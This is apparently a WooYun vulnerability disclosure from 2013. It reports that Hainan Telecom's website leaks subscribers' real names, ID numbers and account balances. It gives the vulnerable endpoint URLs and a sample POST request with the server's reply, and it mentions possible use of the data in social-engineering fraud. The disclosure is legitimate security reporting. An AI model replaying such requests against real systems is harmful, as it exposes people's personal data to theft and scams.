当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-043248

漏洞标题:海南电信官网实名开户信息泄漏等两处漏洞

相关厂商:中国电信

漏洞作者: New4

提交时间:2013-11-19 12:19

修复时间:2014-01-03 12:19

公开时间:2014-01-03 12:19

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-24: 厂商已经确认,细节仅向厂商公开
2013-12-04: 细节向核心白帽子及相关领域专家公开
2013-12-14: 细节向普通白帽子公开
2013-12-24: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

海南电信官网存在实名开户信息泄漏漏洞,全省固话及手机用户用户均受影响!

详细说明:

漏洞地址:http://hi.189.cn/service/transaction/v5/esurfing/renew.jsp
“宽带包年续约功能”在宽带账户 那里输入号码 点获取信息,看抓包数据就会泄漏信息!有开户名和身份证等敏感信息,支持固话和手机号!
身份证在paperNO面会显示。
POST数据:<buffalo-call><method>getCusterMess</method><map><type>java.util.HashMap</type><string>businessNum</string><string>089865238070</string><string>staffNo</string><string></string></map></buffalo-call>
返回:<buffalo-reply><map><type>java.util.HashMap</type><string>param_value</string><string></string><string>custId</string><string>280679</string><string>paperType</string><string>单位公章</string><string>result</string><string>-1</string><string>cartName</string><string>单位公章</string><string>nwkCode</string><string></string><string>userid</string><string>-898</string><string>taocantype</string><string></string><string>nwkoffertype</string><string></string><string>prodid</string><string></string><string>nwkmdseid</string><string></string><string>paperNO</string><string>无证件号</string><string>message</string><string>您没有要续约的宽带套餐!</string><string>valueName</string><string></string><string>fee</string><string></string><string>param_id</string><string></string><string>solelymdseid</string><string></string><string>userName</string><string>海南省工业经济与信息产业局</string><string>datestate</string><string>-1</string><string>userNwk</string><string></string><string>webOrder</string><string></string><string>nwkName</string><string></string><string>taocanresultcode</string><string>-1</string></map></buffalo-reply>
这里只是简单截图,可以获取到用户开户名和身份证(这里是单位没登记)信息!比较懒不想打码就不放实名用户信息了。 随便找个手机用户可以看到效果!

12.png


no.png

漏洞证明:

另一个问题是官网话费余额和用户名泄漏
http://hi.189.cn/service/pay/v5/pay_bank.jsp
和http://hi.189.cn/service/pay/v5/pay_11888.jsp
充值号码输入 手机号或固话号码,即可查询到话费余额 和 用户的名 姓用星号代替!
但是在实名时代的到来我觉得这也算一种用户隐私的泄漏。
特别是结合社会工程学,可以对一个号码进行 名字猜测和余额探测。可能会被咋骗集团利用!
这只是简单利用,任何人都可以利用 很傻瓜化…… 结合社工这东西也可以很屌

00.JPG


修复方案:

联系开发商处理

版权声明:转载请注明来源 New4@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2013-11-24 00:07

厂商回复:

最新状态:

暂无